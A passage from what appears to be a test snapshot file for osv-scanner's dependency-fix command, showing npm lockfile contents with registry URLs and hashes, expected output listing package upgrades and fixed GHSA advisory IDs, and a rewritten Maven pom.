"extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 1] Resolving /pom.xml... Found 12 vulnerabilities matching the filter Can fix 12/12 matching vulnerabilities by overriding 4 dependencies OVERRIDE-PACKAGE: org.apache.httpcomponents:httpclient,4.5.13 OVERRIDE-PACKAGE: org.codehaus.plexus:plexus-utils,3.0.24 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: org.jsoup:jsoup,1.15.3 FIXED-VULN-IDS: GHSA-2x83-r56g-cv47,GHSA-78wr-2p64-hpwj,GHSA-7r82-7xv7-xcpj,GHSA-8vhq-qq4p-grq3,GHSA-cfh5-3ghh-wfjx,GHSA-fmj5-wv96-r2ch,GHSA-g6ph-x5wf-g337,GHSA-gp7f-rwcx-9369,GHSA-gw85-4gmf-m7rh,GHSA-gwrp-pvrq-jmwv,GHSA-jcwr-x25h-x5fh,GHSA-m72m-mhq2-9p6c REMAINING-VULNS: 0 UNFIXABLE-VULNS: 0 Rewriting /pom.xml... --- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 2] --- [TestCommand/fix_non_interactive_override_pom_xml_with_native_data_source - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/no_args_provided - 1] --- [TestCommand/no_args_provided - 2] manifest or lockfile is required --- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 1] Loaded npm local db from /osv-scanner/npm/all.zip Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... --- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 2] --- [TestCommand_OfflineDatabase/fix_non_interactive_in_place_package_lock_json_with_offline_vulns - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": 